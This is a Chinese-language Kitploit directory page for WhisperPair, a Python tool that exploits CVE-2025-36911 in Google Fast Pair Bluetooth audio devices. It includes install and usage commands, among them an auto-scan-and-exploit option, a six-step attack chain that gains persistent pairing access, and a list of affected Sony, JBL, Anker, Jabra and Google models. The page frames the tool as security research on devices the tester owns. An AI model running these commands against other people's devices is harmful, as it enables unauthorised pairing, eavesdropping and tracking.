Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-36911-exploit — 针对 CVE-2025-36911 漏洞的 Python 漏洞利用程序,用于测试我们自己的设备 | Kitploit
工具/GitHubGitHub/penthertz/cve-2025-36911-exploit
侦察蓝牙安全漏洞分析漏洞利用无线安全渗透测试
GitHubpenthertz/cve-2025-36911-exploit

CVE-2025-36911-exploit

针对 CVE-2025-36911 漏洞的 Python 漏洞利用程序,用于测试我们自己的设备

查看仓库
2616个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

WhisperPair Python CLI

用 Python 编写的 Fast Pair CVE-2025-36911 漏洞利用工具,用于测试我们的设备

CVE Python

作者: Sébastien Dudek (@FlUxIuS) @ Penthertz
致谢: whisperpair.eu 发现该漏洞,以及 @ZalexDev 提供的这个出色的 APK,缩短了实现时间 wpair-app


⚠️ 免责声明

仅限授权安全研究。 仅在你拥有的设备上测试。


🐛 漏洞

CVE-2025-36911 影响全球数百万蓝牙音频设备上的 Google Fast Pair 实现。

正常行为: 设备应仅在配对模式(按住按钮、打开充电盒等)下接受配对请求。

漏洞行为: 设备随时接受基于密钥的配对(Key-Based Pairing, KBP)请求,即使处于空闲状态或已配对。

影响

  • 🔊 未授权配对到受害者的耳塞/头戴式耳机
  • 🎤 潜在音频注入/窃听
  • 📍 通过账户密钥追踪设备

⚡ 快速开始

root@kitploit:~
# Install
pip install bleak cryptography
git clone https://github.com/Penthertz/CVE-2025-36911-exploit.git
cd CVE-2025-36911-exploit

# Scan for targets
python3 whisperpair-cli.py scan

# Test if vulnerable
python3 whisperpair-cli.py test AA:BB:CC:DD:EE:FF

# Exploit
python3 whisperpair-cli.py exploit --quick

🎯 漏洞利用策略

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  ATTACKER                           VULNERABLE DEVICE       │
│                                                             │
│  1. BLE Scan ─────────────────────► Fast Pair Advertisement │
│     (Find target)                   (Model ID visible)      │
│                                                             │
│  2. Connect ──────────────────────► GATT Connection         │
│                                                             │
│  3. KBP Request ──────────────────► Key-Based Pairing Char  │
│     (Should be rejected             ✗ NOT REJECTED!         │
│      when not in pairing mode)      (CVE-2025-36911)        │
│                                                             │
│  4. Parse Response ◄────────────── BR/EDR Address           │
│                                                             │
│  5. Write Account Key ────────────► Account Key Char        │
│     (Persistent access)             ✓ ACCEPTED              │
│                                                             │
│  6. Classic BT Pair ──────────────► Audio Profiles (A2DP)   │
│     (Game over)                                             │
└─────────────────────────────────────────────────────────────┘

该工具会自动尝试多种策略:

  1. ENCRYPTED_ECDH - 符合规范的 80 字节加密请求
  2. RAW_WITH_PUBKEY - 原始数据块 + 公钥(部分设备)
  3. RAW_KBP - 明文 16 字节请求(实现有缺陷的设备)

更多信息请参阅此处


📋 命令


🎧 受影响设备

已测试存在漏洞(请检查固件更新):

下载工具
CommandDescription
scan实时更新的 Fast Pair 设备 BLE 扫描
scan -a扫描所有 BLE 设备
info <addr>显示 GATT 服务/特征
test <addr>非侵入式漏洞检测
exploit <addr>完整漏洞利用链
exploit -q自动扫描并利用第一个目标
BrandModels
GooglePixel Buds Pro 2(但通过 Pixel 手机能很快获得更新)
SonyWH-1000XM4、WH-1000XM5/XM6、LinkBuds S、WH-CH520
JBLJBL TUNE BEAM
AnkerSoundcore Liberty 4 NC
JabraElite 8 Active
+ 更多whisperpair.eu